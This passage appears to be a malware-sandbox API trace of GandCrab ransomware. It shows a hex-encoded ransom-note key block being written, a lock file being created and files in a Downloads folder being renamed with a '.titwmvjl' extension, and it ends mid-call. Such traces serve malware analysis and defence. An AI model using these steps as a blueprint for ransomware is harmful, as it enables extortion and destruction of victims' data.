\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0092.142] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0092.143] CloseHandle (hObject=0x230) returned 1 [0092.143] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.143] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.144] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x25, wMilliseconds=0x1ca)) [0092.144] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.144] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.144] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.144] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 56 [0092.144] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\downloads\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0092.145] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.145] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.145] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\") returned 32 [0092.146] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\*" [0092.146] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503578 [0092.146] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.146] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.147] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.147] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.147] lstrcmpW (lpString1="ChromeSetup.exe", lpString2=".") returned 1 [0092.147] lstrcmpW (lpString1="ChromeSetup.exe", lpString2="..") returned 1 [0092.147] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="ChromeSetup.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe" [0092.147] lstrlenW (lpString=".titwmvjl") returned 9 [0092.147] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe") returned 47 [0092.147] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.147] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe.titwmvjl") returned 56 [0092.147] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\ChromeSetup.exe") returned 47 [0092.147] lstrlenW (lpString=".exe") returned 4 [0092.147] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.148] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".exe ") returned 5 [0092.148] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.148] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.148] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.148] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0092.148] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0092.148] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a09d2ca4deb61a.lock" [0092.148] lstrlenW (lpString=".titwmvjl") returned 9 [0092.148] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 56 [0092.148] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.149] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 65 [0092.149] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\d2ca4a09d2ca4deb61a.lock") returned 56 [0092.149] lstrlenW (lpString=".lock") returned 5 [0092.149] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.149] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0092.149] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.149] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.149] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.149] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.149] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.150] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini" [0092.150] lstrlenW (lpString=".titwmvjl") returned 9 [0092.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned 43 [0092.150] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.150] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini.titwmvjl") returned 52 [0092.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned 43 [0092.150] lstrlenW (lpString=".ini") returned 4 [0092.150] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.150] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0092.150] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0092.150] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned 43 [0092.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\desktop.ini") returned 43 [0092.150] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0092.150] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.151] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.151] lstrcmpW (lpString1="jre-8u131-windows-x64.exe", lpString2=".") returned 1 [0092.151] lstrcmpW (lpString1="jre-8u131-windows-x64.exe", lpString2="..") returned 1 [0092.151] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="jre-8u131-windows-x64.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe" [0092.151] lstrlenW (lpString=".titwmvjl") returned 9 [0092.151] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe") returned 57 [0092.151] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.151] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe.titwmvjl") returned 66 [0092.151] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\jre-8u131-windows-x64.exe") returned 57 [0092.151] lstrlenW (lpString=".exe") returned 4 [0092.151] 